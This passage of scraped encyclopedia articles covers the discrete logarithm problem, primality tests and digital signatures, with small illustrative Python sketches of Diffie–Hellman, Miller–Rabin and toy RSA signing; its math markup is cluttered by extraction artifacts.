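    found by exhaustive search -- practical only for very small groups."""
    value = 1
    for k in range(modulus):
        if value == target % modulus:
            return k
        value = (value * base) % modulus
    return None  # target is not in the subgroup generated by base

print(pow(3, 4, 17))            # 13: modular exponentiation, the "easy" direction
print(discrete_log(3, 13, 17))  # 4: the discrete logarithm, recovered by brute force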
The familiar base change formula for ordinary logarithms remains valid: Ifc{\displaystyle c}is another generator ofH{\displaystyle H}, then The discrete logarithm problem is considered to be computationally intractable. That is, no efficient classical algorithm is known for computing discrete logarithms in general. A general algorithm for computinglogb⁡a{\displaystyle \log _{b}a}in finite groupsG{\displaystyle G}is to raiseb{\displaystyle b}to larger and larger powersk{\displaystyle k}until the desireda{\displaystyle a}is found. This algorithm is sometimes calledtrial multiplication. It requiresrunning timelinearin the size of the groupG{\displaystyle G}and thusexponentialin the number of digits in the size of the group. Therefore, it is an exponential-time algorithm, practical only for small groupsG{\displaystyle G}. More sophisticated algorithms exist, usually inspired by similar algorithms forinteger factorization. These algorithms run faster than the naïve algorithm, some of them proportional to thesquare rootof the size of the group, and thus exponential in half the number of digits in the size of the group. However, none of them runs inpolynomial time(in the number of digits in the size of the group). There is an efficientquantum algorithmdue toPeter Shor.[3] Efficient classical algorithms also exist in certain special cases. For example, in the group of the integers modulop{\displaystyle p}under addition, the powerbk{\displaystyle b^{k}}becomes a productb⋅k{\displaystyle b\cdot k}, and equality means congruence modulop{\displaystyle p}in the integers. Theextended Euclidean algorithmfindsk{\displaystyle k}quickly. WithDiffie–Hellman, a cyclic group modulo a primep{\displaystyle p}is used, allowing an efficient computation of the discrete logarithm with Pohlig–Hellman if the order of the group (beingp−1{\displaystyle p-1}) is sufficientlysmooth, i.e. has no largeprime factors. While computing discrete logarithms and integer factorization are distinct problems, they share some properties: There exist groups for which computing discrete logarithms is apparently difficult. In some cases (e.g. large prime order subgroups of groupsZp×{\displaystyle \mathbf {Z} _{p}^{\times }}) there is not only no efficient algorithm known for the worst case, but theaverage-case complexitycan be shown to be about as hard as the worst case usingrandom self-reducibility.[4] At the same time, the inverse problem of discrete exponentiation is not difficult (it can be computed efficiently usingexponentiation by squaring, for example). This asymmetry is analogous to the one between integer factorization and integer multiplication. Both asymmetries (and other possiblyone-way functions) have been exploited in the construction of cryptographic systems. Popular choices for the groupG{\displaystyle G}in discrete logarithm cryptography (DLC) are the cyclic groupsZp×{\displaystyle \mathbf {Z} _{p}^{\times }}(e.g.ElGamal encryption,Diffie–Hellman key exchange, and theDigital Signature Algorithm) and cyclic subgroups ofelliptic curvesoverfinite fields(seeElliptic curve cryptography). While there is no publicly known algorithm for solving the discrete logarithm problem in general, the first three steps of thenumber field sievealgorithm only depend on the groupG{\displaystyle G}, not on the specific elements ofG{\displaystyle G}whose finitelog{\displaystyle \log }is desired. 
Byprecomputingthese three steps for a specific group, one need only carry out the last step, which is much less computationally expensive than the first three, to obtain a specific logarithm in that group.[5] It turns out that muchinternettraffic uses one of a handful of groups that are of order 1024 bits or less, e.g. cyclic groups with order of the Oakley primes specified in RFC 2409.[6]TheLogjamattack used this vulnerability to compromise a variety of internet services that allowed the use of groups whose order was a 512-bit prime number, so calledexport grade.[5] The authors of the Logjam attack estimate that the much more difficult precomputation needed to solve the discrete log problem for a 1024-bit prime would be within the budget of a large nationalintelligence agencysuch as the U.S.National Security Agency(NSA). The Logjam authors speculate that precomputation against widely reused 1024 DH primes is behind claims inleaked NSA documentsthat NSA is able to break much of current cryptography.[5]
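A toy sketch of Diffie–Hellman key exchange over Zp× may help make the role of the discrete logarithm concrete. The parameters below (p = 23, g = 5, a generator of Z23×) are illustrative only; real deployments use standardized groups with primes of 2048 bits or more, precisely because of the precomputation attacks discussed above.

import secrets

p = 23   # toy prime -- far too small for real use
g = 5    # a generator of the multiplicative group modulo 23

a = secrets.randbelow(p - 2) + 1   # Alice's secret exponent
b = secrets.randbelow(p - 2) + 1   # Bob's secret exponent

A = pow(g, a, p)   # Alice sends A; recovering a from A is a discrete logarithm problem
B = pow(g, b, p)   # Bob sends B

shared_alice = pow(B, a, p)
shared_bob   = pow(A, b, p)
assert shared_alice == shared_bob  # both sides derive g**(a*b) mod p

An eavesdropper sees p, g, A and B; recovering the shared secret from them requires solving a discrete logarithm (or the closely related Diffie–Hellman problem) in the chosen group.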
https://en.wikipedia.org/wiki/Discrete_logarithm_problem
Aprimality testis analgorithmfor determining whether an input number isprime. Among other fields ofmathematics, it is used forcryptography. Unlikeinteger factorization, primality tests do not generally giveprime factors, only stating whether the input number is prime or not. Factorization is thought to be a computationally difficult problem, whereas primality testing is comparatively easy (itsrunning timeispolynomialin the size of the input). Some primality tests prove that a number is prime, while others likeMiller–Rabinprove that a number iscomposite. Therefore, the latter might more accurately be calledcompositeness testsinstead of primality tests. The simplest primality test istrial division: given an input number,n{\displaystyle n}, check whether it isdivisibleby anyprime numberbetween 2 andn{\displaystyle {\sqrt {n}}}(i.e., whether the division leaves noremainder). If so, thenn{\displaystyle n}iscomposite. Otherwise, it is prime.[1]For any divisorp≥n{\displaystyle p\geq {\sqrt {n}}}, there must be another divisorn/p≤n{\displaystyle n/p\leq {\sqrt {n}}}, and a prime divisorq{\displaystyle q}ofn/p{\displaystyle n/p}, and therefore looking for prime divisors at mostn{\displaystyle {\sqrt {n}}}is sufficient. For example, consider the number 100, whose divisors are these numbers: When all possible divisors up ton{\displaystyle n}are tested, some divisors will be discoveredtwice. To observe this, consider the list of divisor pairs of 100: Products past10×10{\displaystyle 10\times 10}are the reverse of products that appeared earlier. For example,5×20{\displaystyle 5\times 20}and20×5{\displaystyle 20\times 5}are the reverse of each other. Further, that of the two divisors,5≤100=10{\displaystyle 5\leq {\sqrt {100}}=10}and20≥100=10{\displaystyle 20\geq {\sqrt {100}}=10}. This observation generalizes to alln{\displaystyle n}: all divisor pairs ofn{\displaystyle n}contain a divisor less than or equal ton{\displaystyle {\sqrt {n}}}, so the algorithm need only search for divisors less than or equal ton{\displaystyle {\sqrt {n}}}to guarantee detection of all divisor pairs.[1] Also, 2 is a prime dividing 100, which immediately proves that 100 is not prime. Every positive integer except 1 is divisible by at least one prime number by theFundamental Theorem of Arithmetic. Therefore the algorithm need only search forprimedivisors less than or equal ton{\displaystyle {\sqrt {n}}}. For another example, consider how this algorithm determines the primality of 17. One has4<17<5{\displaystyle 4<{\sqrt {17}}<5}, and the only primes≤17{\displaystyle \leq {\sqrt {17}}}are 2 and 3. Neither divides 17, proving that 17 is prime. For a last example, consider 221. One has14<221<15{\displaystyle 14<{\sqrt {221}}<15}, and the primes≤221{\displaystyle \leq {\sqrt {221}}}are 2, 3, 5, 7, 11, and 13. Upon checking each, one discovers that221/13=17{\displaystyle 221/13=17}, proving that 221 is not prime. In cases where it is not feasible to compute the list of primes≤n{\displaystyle \leq {\sqrt {n}}}, it is also possible to simply (and slowly) check all numbers between2{\displaystyle 2}andn{\displaystyle {\sqrt {n}}}for divisors. A simple improvement is to test divisibility by 2 and by just the odd numbers between 3 andn{\displaystyle {\sqrt {n}}}, since divisibility by an even number implies divisibility by 2. This method can be improved further. Observe that all primes greater than 5 are of the form6k+i{\displaystyle 6k+i}for a nonnegative integerk{\displaystyle k}andi∈{1,5}{\displaystyle i\in \{1,5\}}. 
Indeed, every integer is of the form6k+i{\displaystyle 6k+i}for a positive integerk{\displaystyle k}andi∈{0,1,2,3,4,5}{\displaystyle i\in \{0,1,2,3,4,5\}}. Since 2 divides6k,6k+2{\displaystyle 6k,6k+2}, and6k+4{\displaystyle 6k+4}, and 3 divides6k{\displaystyle 6k}and6k+3{\displaystyle 6k+3}, the only possible remainders mod 6 for a prime greater than 3 are 1 and 5. So, a more efficient primality test forn{\displaystyle n}is to test whethern{\displaystyle n}is divisible by 2 or 3, then to check through all numbers of the form6k+1{\displaystyle 6k+1}and6k+5{\displaystyle 6k+5}which are≤n{\displaystyle \leq {\sqrt {n}}}. This is almost three times as fast as testing all numbers up ton{\displaystyle {\sqrt {n}}}. Generalizing further, all primes greater thanc#{\displaystyle c\#}(c primorial) are of the formc#⋅k+i{\displaystyle c\#\cdot k+i}fori,k{\displaystyle i,k}positive integers,0≤i<c#{\displaystyle 0\leq i<c\#}, andi{\displaystyle i}coprimetoc#{\displaystyle c\#}. For example, consider6#=2⋅3⋅5=30{\displaystyle 6\#=2\cdot 3\cdot 5=30}. All integers are of the form30k+i{\displaystyle 30k+i}fori,k{\displaystyle i,k}integers with0≤i<30{\displaystyle 0\leq i<30}. Now, 2 divides0,2,4,…,28{\displaystyle 0,2,4,\dots ,28}, 3 divides0,3,6,…,27{\displaystyle 0,3,6,\dots ,27}, and 5 divides0,5,10,…,25{\displaystyle 0,5,10,\dots ,25}. Thus all prime numbers greater than 30 are of the form30k+i{\displaystyle 30k+i}fori∈{1,7,11,13,17,19,23,29}{\displaystyle i\in \{1,7,11,13,17,19,23,29\}}. Of course, not all numbers of the formc#⋅k+i{\displaystyle c\#\cdot k+i}withi{\displaystyle i}coprime toc#{\displaystyle c\#}are prime. For example,19⋅23=437=210⋅2+17=2⋅7#+17{\displaystyle 19\cdot 23=437=210\cdot 2+17=2\cdot 7\#+17}is not prime, even though 17 is coprime to7#=2⋅3⋅5⋅7{\displaystyle 7\#=2\cdot 3\cdot 5\cdot 7}. Asc{\displaystyle c}grows, the fraction of coprime remainders to remainders decreases, and so the time to testn{\displaystyle n}decreases (though it still necessary to check for divisibility by all primes that are less thanc{\displaystyle c}). Observations analogous to the preceding can be appliedrecursively, giving theSieve of Eratosthenes. One way to speed up these methods (and all the others mentioned below) is to pre-compute and store a list of all primes up to a certain bound, such as all primes up to 200. (Such a list can be computed with the Sieve of Eratosthenes or by an algorithm that tests each incrementalm{\displaystyle m}against all known primes≤m{\displaystyle \leq {\sqrt {m}}}). Then, before testingn{\displaystyle n}for primality with a large-scale method,n{\displaystyle n}can first be checked for divisibility by any prime from the list. If it is divisible by any of those numbers then it is composite, and any further tests can be skipped. A simple but inefficient primality test usesWilson's theorem, which states thatp{\displaystyle p}is prime if and only if: Although this method requires aboutp{\displaystyle p}modular multiplications,[2]rendering it impractical, theorems about primes and modular residues form the basis of many more practical methods. These are tests that seem to work well in practice, but are unproven and therefore are not, technically speaking, algorithms at all. TheFermat primality testand the Fibonacci test are simple examples, and they are effective when combined.John Selfridgehas conjectured that ifpis an odd number, andp≡ ±2 (mod 5), thenpwill be prime if both of the following hold: wherefkis thek-thFibonacci number. 
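A minimal sketch of trial division using the 6k ± 1 observation above (pure Python; the function name is ours).

def is_prime(n: int) -> bool:
    """Deterministic trial division: check 2 and 3, then candidate divisors of
    the form 6k - 1 and 6k + 1 up to sqrt(n), as described above."""
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    i = 5                      # 5 = 6*1 - 1
    while i * i <= n:
        if n % i == 0 or n % (i + 2) == 0:
            return False
        i += 6
    return True

print([n for n in range(2, 50) if is_prime(n)])
print(is_prime(221))   # False: 221 = 13 * 17, as in the example above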
The first condition is the Fermat primality test using base 2. In general, ifp≡ a (mod x^2 + 4), whereais a quadratic non-residue (mod x^2 + 4) thenpshould be prime if the following conditions hold: where f(x)_k is thek-thFibonacci polynomialatx. Selfridge,Carl PomeranceandSamuel Wagstafftogether offer $620 for a counterexample.[3] Probabilistic testsare more rigorous than heuristics in that they provide provable bounds on the probability of being fooled by a composite number. Multiple popular primality tests are probabilistic tests. These tests use, apart from the tested numbern, some other numbersawhich are chosen at random from somesample space; the usual randomized primality tests never report a prime number as composite, but it is possible for a composite number to be reported as prime. The probability of error can be reduced by repeating the test with several independently chosen values ofa; for two commonly used tests, foranycompositenat least half thea's detectn's compositeness, sokrepetitions reduce the error probability to at most 2^−k, which can be made arbitrarily small by increasingk. The basic structure of randomized primality tests is as follows: After one or more iterations, ifnis not found to be a composite number, then it can be declaredprobably prime. The simplest probabilistic primality test is theFermat primality test(actually a compositeness test). It works as follows: If a^(n−1) (modulon) is 1 butnis not prime, thennis called apseudoprimeto basea. In practice, if a^(n−1) (modulon) is 1, thennis usually prime. But here is a counterexample: ifn= 341 anda= 2, then 2^340 ≡ 1 (mod 341) even though 341 = 11·31 is composite. In fact, 341 is the smallest pseudoprime base 2 (see Figure 1 of[4]). There are only 21853 pseudoprimes base 2 that are less than 2.5×10^10(see page 1005 of[4]). This means that, fornup to 2.5×10^10, if 2^(n−1) (modulon) equals 1, thennis prime, unlessnis one of these 21853 pseudoprimes. Some composite numbers (Carmichael numbers) have the property that a^(n−1) is 1 (modulon) for everyathat is coprime ton. The smallest example isn= 561 = 3·11·17, for which a^560 is 1 (modulo 561) for allacoprime to 561. Nevertheless, the Fermat test is often used if a rapid screening of numbers is needed, for instance in the key generation phase of theRSA public key cryptographic algorithm. TheMiller–Rabin primality testandSolovay–Strassen primality testare more sophisticated variants, which detect all composites (once again, this means: foreverycomposite numbern, at least 3/4 (Miller–Rabin) or 1/2 (Solovay–Strassen) of numbersaare witnesses of compositeness ofn). These are also compositeness tests. The Miller–Rabin primality test works as follows: Given an integern, choose some positive integera<n. Let 2^s·d =n− 1, wheredis odd. If a^d ≢ 1 (mod n) and a^(2^r·d) ≢ −1 (mod n) for all 0 ≤ r ≤ s − 1, thennis composite andais a witness for the compositeness. Otherwise,nmay or may not be prime. The Miller–Rabin test is astrong probable primetest (see PSW[4]page 1004). The Solovay–Strassen primality test uses another equality: Given an odd numbern, choose some integera<n; if a^((n−1)/2) ≢ (a/n) (mod n), where (a/n) is the Jacobi symbol, thennis composite andais a witness for the compositeness. Otherwise,nmay or may not be prime. The Solovay–Strassen test is anEuler probable primetest (see PSW[4]page 1003). For each individual value ofa, the Solovay–Strassen test is weaker than the Miller–Rabin test. For example, ifn= 1905 anda= 2, then the Miller–Rabin test shows thatnis composite, but the Solovay–Strassen test does not. This is because 1905 is an Euler pseudoprime base 2 but not a strong pseudoprime base 2 (this is illustrated in Figure 1 of PSW[4]).
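A minimal sketch of the Miller–Rabin test as described above (pure Python, for illustration only; the number of rounds is an arbitrary choice, and production code should use a vetted library).

import random

def miller_rabin(n: int, rounds: int = 20) -> bool:
    """Probabilistic compositeness test: returns False if a witness proves n
    composite, True if n is probably prime. For any composite n, each round
    with a random base catches it with probability at least 3/4."""
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False
    # Write n - 1 = 2**s * d with d odd.
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False   # a is a witness for the compositeness of n
    return True            # probably prime

print(miller_rabin(341))        # False: the base-2 Fermat pseudoprime is caught
print(miller_rabin(561))        # False: Carmichael numbers are caught as well
print(miller_rabin(2**61 - 1))  # True: a known Mersenne prime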
The Miller–Rabin and the Solovay–Strassen primality tests are simple and are much faster than other general primality tests. One method of improving efficiency further in some cases is theFrobenius pseudoprimality test; a round of this test takes about three times as long as a round of Miller–Rabin, but achieves a probability bound comparable to seven rounds of Miller–Rabin. The Frobenius test is a generalization of theLucas probable primetest. TheBaillie–PSW primality testis a probabilistic primality test that combines a Fermat or Miller–Rabin test with aLucas probable primetest to get a primality test that has no known counterexamples. That is, there are no known compositenfor which this test reports thatnis probably prime.[5][6]It has been shown that there are no counterexamples forn<264{\displaystyle <2^{64}}. Leonard Adlemanand Ming-Deh Huang presented an errorless (but expected polynomial-time) variant of theelliptic curve primality test. Unlike the other probabilistic tests, this algorithm produces aprimality certificate, and thus can be used to prove that a number is prime.[7]The algorithm is prohibitively slow in practice. Ifquantum computerswere available, primality could be testedasymptotically fasterthan by using classical computers. A combination ofShor's algorithm, an integer factorization method, with thePocklington primality testcould solve the problem inO((log⁡n)3(log⁡log⁡n)2log⁡log⁡log⁡n){\displaystyle O((\log n)^{3}(\log \log n)^{2}\log \log \log n)}.[8] Near the beginning of the 20th century, it was shown that a corollary ofFermat's little theoremcould be used to test for primality.[9]This resulted in thePocklington primality test.[10]However, as this test requires a partialfactorizationofn− 1, the running time was still quite slow in the worst case. The firstdeterministicprimality test significantly faster than the naive methods was thecyclotomy test; its runtime can be proven to be O((log n)^(c log log log n)), wherenis the number to test for primality andcis a constant independent ofn. A number of further improvements were made, but none could be proven to have polynomial running time. (Running time is measured in terms of the size of the input, which in this case is ~ logn, that being the number of bits needed to represent the numbern.) Theelliptic curve primality testcan be proven to run in O((log n)^6), if some conjectures onanalytic number theoryare true.Similarly, under thegeneralized Riemann hypothesis(which Miller, confusingly, calls the "extended Riemann hypothesis"), the deterministicMiller's test, which forms the basis of the probabilistic Miller–Rabin test, can be proved to run in Õ((log n)^4).[11]In practice, this algorithm is slower than the other two for sizes of numbers that can be dealt with at all. Because the implementation of these two methods is rather difficult and creates a risk of programming errors, slower but simpler tests are often preferred. In 2002, the first provably unconditional deterministic polynomial time test for primality was invented byManindra Agrawal,Neeraj Kayal, andNitin Saxena.
TheAKS primality testruns in Õ((log n)^12) (improved to Õ((log n)^7.5)[12]in the published revision of their paper), which can be further reduced to Õ((log n)^6) if theSophie Germain conjectureis true.[13]Subsequently, Lenstra and Pomerance presented a version of the test which runs in time Õ((log n)^6) unconditionally.[14] Agrawal, Kayal and Saxena suggest a variant of their algorithm which would run in Õ((log n)^3) ifAgrawal's conjectureis true; however, a heuristic argument by Hendrik Lenstra and Carl Pomerance suggests that it is probably false.[12]A modified version of Agrawal's conjecture, the Agrawal–Popovych conjecture,[15]may still be true. Incomputational complexity theory, the formal language corresponding to the prime numbers is denoted as PRIMES. It is easy to show that PRIMES is inCo-NP: its complement COMPOSITES is inNPbecause one can decide compositeness by nondeterministically guessing a factor. In 1975,Vaughan Prattshowed that there existed a certificate for primality that was checkable in polynomial time, and thus that PRIMES was inNP, and therefore in⁠NP∩coNP{\displaystyle {\mathsf {NP\cap coNP}}}⁠. Seeprimality certificatefor details. The subsequent discovery of the Solovay–Strassen and Miller–Rabin algorithms put PRIMES incoRP. In 1992, the Adleman–Huang algorithm[7]reduced the complexity to⁠ZPP=RP∩coRP{\displaystyle {\mathsf {{\color {Blue}ZPP}=RP\cap coRP}}}⁠, which superseded Pratt's result. TheAdleman–Pomerance–Rumely primality testfrom 1983 put PRIMES inQP(quasi-polynomial time), which is not known to be comparable with the classes mentioned above. Because of its tractability in practice, polynomial-time algorithms assuming the Riemann hypothesis, and other similar evidence, it was long suspected but not proven that primality could be solved in polynomial time. The existence of theAKS primality testfinally settled this long-standing question and placed PRIMES inP. However, PRIMES is not known to beP-complete, and it is not known whether it lies in classes lying insidePsuch asNCorL. It is known that PRIMES is not in AC^0.[16] Certain number-theoretic methods exist for testing whether a number is prime, such as theLucas testandProth's test. These tests typically require factorization ofn+ 1,n− 1, or a similar quantity, which means that they are not useful for general-purpose primality testing, but they are often quite powerful when the tested numbernis known to have a special form. The Lucas test relies on the fact that themultiplicative orderof a numberamodulonisn− 1 for a primenwhenais aprimitive root modulo n. If we can showais primitive forn, we can shownis prime.
https://en.wikipedia.org/wiki/Primality_test
Adigital signatureis a mathematical scheme for verifying the authenticity of digital messages or documents. A valid digital signature on a message gives a recipient confidence that the message came from a sender known to the recipient.[1][2] Digital signatures are a standard element of mostcryptographic protocolsuites, and are commonly used for software distribution, financial transactions,contract management software, and in other cases where it is important to detect forgery ortampering. Digital signatures are often used to implementelectronic signatures, which include any electronic data that carries the intent of a signature,[3]but not all electronic signatures use digital signatures.[4][5]Electronic signatures have legal significance in some countries, includingBrazil,Canada,[6]South Africa,[7]Russia,[8]theUnited States,Algeria,[9]Turkey,[10]India,[11]Indonesia,Mexico,Saudi Arabia,[12]Uruguay,[13]Switzerland,Chile[14]and the countries of theEuropean Union.[15][16] Digital signatures employasymmetric cryptography. In many instances, they provide a layer of validation and security to messages sent through a non-secure channel: Properly implemented, a digital signature gives the receiver reason to believe the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects, but properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes, in the sense used here, are cryptographically based, and must be implemented properly to be effective. They can also providenon-repudiation, meaning that the signer cannot successfully claim they did not sign a message, while also claiming theirprivate keyremains secret.[17]Further, some non-repudiation schemes offer a timestamp for the digital signature, so that even if the private key is exposed, the signature is valid.[18][19]Digitally signed messages may be anything representable as abitstring: examples include electronic mail, contracts, or a message sent via some other cryptographic protocol. A digital signature scheme typically consists of three algorithms: Two main properties are required: First, the authenticity of a signature generated from a fixed message and fixed private key can be verified by using the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party without knowing that party's private key. A digital signature is an authentication mechanism that enables the creator of the message to attach a code that acts as a signature. TheDigital Signature Algorithm(DSA), developed by theNational Institute of Standards and Technology, is one ofmany examplesof a signing algorithm. In the following discussion, 1nrefers to aunary number. 
Formally, adigital signature schemeis a triple of probabilistic polynomial time algorithms, (G,S,V), satisfying: For correctness,SandVmust satisfy A digital signature scheme issecureif for every non-uniform probabilistic polynomial timeadversary,A whereAS(sk, · )denotes thatAhas access to theoracle,S(sk, · ),Qdenotes the set of the queries onSmade byA, which knows the public key,pk, and the security parameter,n, andx∉Qdenotes that the adversary may not directly query the string,x, onS.[20][21] In 1976,Whitfield DiffieandMartin Hellmanfirst described the notion of a digital signature scheme, although they only conjectured that such schemes existed based on functions that are trapdoor one-way permutations.[22][23]Soon afterwards,Ronald Rivest,Adi Shamir, andLen Adlemaninvented theRSAalgorithm, which could be used to produce primitive digital signatures[24](although only as a proof-of-concept – "plain" RSA signatures are not secure[25]). The first widely marketed software package to offer digital signature wasLotus Notes1.0, released in 1989, which used the RSA algorithm.[26] Other digital signature schemes were soon developed after RSA, the earliest beingLamport signatures,[27]Merkle signatures(also known as "Merkle trees" or simply "Hash trees"),[28]andRabin signatures.[29] In 1988,Shafi Goldwasser,Silvio Micali, andRonald Rivestbecame the first to rigorously define the security requirements of digital signature schemes.[30]They described a hierarchy of attack models for signature schemes, and also presented theGMR signature scheme, the first that could be proved to prevent even an existential forgery against a chosen message attack, which is the currently accepted security definition for signature schemes.[30]The first such scheme which is not built on trapdoor functions but rather on a family of function with a much weaker required property of one-way permutation was presented byMoni NaorandMoti Yung.[31] One digital signature scheme (of many) is based onRSA. To create signature keys, generate an RSA key pair containing a modulus,N, that is the product of two random secret distinct large primes, along with integers,eandd, such thated≡1 (modφ(N)), whereφisEuler's totient function. The signer's public key consists ofNande, and the signer's secret key containsd. Used directly, this type of signature scheme is vulnerable to key-only existential forgery attack. To create a forgery, the attacker picks a random signature σ and uses the verification procedure to determine the message,m, corresponding to that signature.[32]In practice, however, this type of signature is not used directly, but rather, the message to be signed is firsthashedto produce a short digest, that is thenpaddedto larger width comparable toN, then signed with the reversetrapdoor function.[33]This forgery attack, then, only produces the padded hash function output that corresponds to σ, but not a message that leads to that value, which does not lead to an attack. In the random oracle model,hash-then-sign(an idealized version of that practice where hash and padding combined have close toNpossible outputs), this form of signature is existentially unforgeable, even against achosen-plaintext attack.[23][clarification needed][34] There are several reasons to sign such a hash (or message digest) instead of the whole document. 
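The RSA-based scheme described above can be sketched with deliberately tiny textbook parameters. This is a toy illustration of hash-then-sign, not a secure implementation: the primes are far too small, and the digest is reduced modulo N rather than padded to its width as real schemes (for example, RSA-PSS in a vetted library) do.

import hashlib

# Toy key generation with tiny primes -- for illustration only, never for real use.
p, q = 61, 53
N = p * q                   # modulus, 3233
phi = (p - 1) * (q - 1)     # Euler's totient of N, 3120
e = 17                      # public exponent, coprime to phi
d = pow(e, -1, phi)         # private exponent: e*d = 1 (mod phi)

def toy_sign(message: bytes) -> int:
    """Hash the message, squeeze the digest into the tiny modulus, then apply
    the private key (real schemes pad the digest to the width of N instead)."""
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % N
    return pow(digest, d, N)

def toy_verify(message: bytes, signature: int) -> bool:
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % N
    return pow(signature, e, N) == digest

msg = b"transfer 100 to branch 42"
sig = toy_sign(msg)
print(toy_verify(msg, sig))                            # True
print(toy_verify(b"transfer 900 to branch 42", sig))   # False: the altered message fails verification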
As organizations move away from paper documents with ink signatures or authenticity stamps, digital signatures can provide added assurances of the evidence to provenance, identity, and status of anelectronic documentas well as acknowledging informed consent and approval by a signatory. The United States Government Printing Office (GPO) publishes electronic versions of the budget, public and private laws, and congressional bills with digital signatures. Universities including Penn State,University of Chicago, and Stanford are publishing electronic student transcripts with digital signatures. Below are some common reasons for applying a digital signature to communications: A message may have letterhead or a handwritten signature identifying its sender, but letterheads and handwritten signatures can be copied and pasted onto forged messages. Even legitimate messages may be modified in transit.[35] If a bank's central office receives a letter claiming to be from a branch office with instructions to change the balance of an account, the central bankers need to be sure, before acting on the instructions, that they were actually sent by a branch banker, and not forged—whether a forger fabricated the whole letter, or just modified an existing letter in transit by adding some digits. With a digital signature scheme, the central office can arrange beforehand to have a public key on file whose private key is known only to the branch office. The branch office can later sign a message and the central office can use the public key to verify the signed message was not a forgery before acting on it. A forger whodoesn'tknow the sender's private key can't sign a different message, or even change a single digit in an existing message without making the recipient's signature verification fail.[35][1][2] Encryptioncan hide the content of the message from an eavesdropper, but encryption on its own may not let recipient verify the message's authenticity, or even detectselective modifications like changing a digit—if the bank's offices simply encrypted the messages they exchange, they could still be vulnerable to forgery. In other applications, such as software updates, the messages are not secret—when a software author publishes a patch for all existing installations of the software to apply, the patch itself is not secret, but computers running the software must verify the authenticity of the patch before applying it, lest they become victims to malware.[2] Replays.A digital signature scheme on its own does not prevent a valid signed message from being recorded and then maliciously reused in areplay attack. For example, the branch office may legitimately request that bank transfer be issued once in a signed message. 
If the bank doesn't use a system of transaction IDs in their messages to detect which transfers have already happened, someone could illegitimately reuse the same signed message many times to drain an account.[35] Uniqueness and malleability of signatures.A signature itself cannot be used to uniquely identify the message it signs—in some signature schemes, every message has a large number of possible valid signatures from the same signer, and it may be easy, even without knowledge of the private key, to transform one valid signature into another.[36]If signatures are misused as transaction IDs in an attempt by a bank-like system such as aBitcoinexchange to detect replays, this can be exploited to replay transactions.[37] Authenticating a public key.Prior knowledge of apublic keycan be used to verify authenticity of asigned message, but not the other way around—prior knowledge of asigned messagecannot be used to verify authenticity of apublic key. In some signature schemes, given a signed message, it is easy to construct a public key under which the signed message will pass verification, even without knowledge of the private key that was used to make the signed message in the first place.[38] Non-repudiation,[15]or more specifically non-repudiation of origin, is an important aspect of digital signatures. By this property, an entity that has signed some information cannot at a later time deny having signed it. Similarly, access to the public key only does not enable a fraudulent party to fake a valid signature. Note that these authentication, non-repudiation etc. properties rely on the secret keynot having been revokedprior to its usage. Publicrevocationof a key-pair is a required ability, else leaked secret keys would continue to implicate the claimed owner of the key-pair. Checking revocation status requires an "online" check; e.g., checking acertificate revocation listor via theOnline Certificate Status Protocol.[16]Very roughly this is analogous to a vendor who receives credit-cards first checking online with the credit-card issuer to find if a given card has been reported lost or stolen. Of course, with stolen key pairs, the theft is often discovered only after the secret key's use, e.g., to sign a bogus certificate for espionage purpose. In their foundational paper, Goldwasser, Micali, and Rivest lay out a hierarchy of attack models against digital signatures:[30] They also describe a hierarchy of attack results:[30] The strongest notion of security, therefore, is security against existential forgery under an adaptive chosen message attack. All public key / private key cryptosystems depend entirely on keeping the private key secret. A private key can be stored on a user's computer, and protected by a local password, but this has two disadvantages: A more secure alternative is to store the private key on asmart card. Many smart cards are designed to be tamper-resistant (although some designs have been broken, notably byRoss Andersonand his students[39]). In a typical digital signature implementation, the hash calculated from the document is sent to the smart card, whose CPU signs the hash using the stored private key of the user, and then returns the signed hash. Typically, a user must activate their smart card by entering apersonal identification numberor PIN code (thus providingtwo-factor authentication). It can be arranged that the private key never leaves the smart card, although this is not always implemented. 
If the smart card is stolen, the thief will still need the PIN code to generate a digital signature. This reduces the security of the scheme to that of the PIN system, although it still requires an attacker to possess the card. A mitigating factor is that private keys, if generated and stored on smart cards, are usually regarded as difficult to copy, and are assumed to exist in exactly one copy. Thus, the loss of the smart card may be detected by the owner and the corresponding certificate can be immediately revoked. Private keys that are protected by software only may be easier to copy, and such compromises are far more difficult to detect. Entering a PIN code to activate the smart card commonly requires a numeric keypad. Some card readers have their own numeric keypad. This is safer than using a card reader integrated into a PC, and then entering the PIN using that computer's keyboard. Readers with a numeric keypad are meant to circumvent the eavesdropping threat where the computer might be running a keystroke logger, potentially compromising the PIN code. Specialized card readers are also less vulnerable to tampering with their software or hardware and are often EAL3 certified. Smart card design is an active field, and there are smart card schemes which are intended to avoid these particular problems, despite having few security proofs so far. One of the main differences between a digital signature and a written signature is that the user does not "see" what they sign. The user application presents a hash code to be signed by the digital signing algorithm using the private key. An attacker who gains control of the user's PC can possibly replace the user application with a foreign substitute, in effect replacing the user's own communications with those of the attacker. This could allow a malicious application to trick a user into signing any document by displaying the user's original on-screen, but presenting the attacker's own documents to the signing application. To protect against this scenario, an authentication system can be set up between the user's application (word processor, email client, etc.) and the signing application. The general idea is to provide some means for both the user application and signing application to verify each other's integrity. For example, the signing application may require all requests to come from digitally signed binaries. One of the main differences between a cloud-based digital signature service and a locally provided one is risk. Many risk-averse companies, including governments, financial and medical institutions, and payment processors, require more secure standards, like FIPS 140-2 level 3 and FIPS 201 certification, to ensure the signature is validated and secure. Technically speaking, a digital signature applies to a string of bits, whereas humans and applications "believe" that they sign the semantic interpretation of those bits. In order to be semantically interpreted, the bit string must be transformed into a form that is meaningful for humans and applications, and this is done through a combination of hardware and software based processes on a computer system. The problem is that the semantic interpretation of bits can change as a function of the processes used to transform the bits into semantic content. It is relatively easy to change the interpretation of a digital document by implementing changes on the computer system where the document is being processed. From a semantic perspective this creates uncertainty about what exactly has been signed.
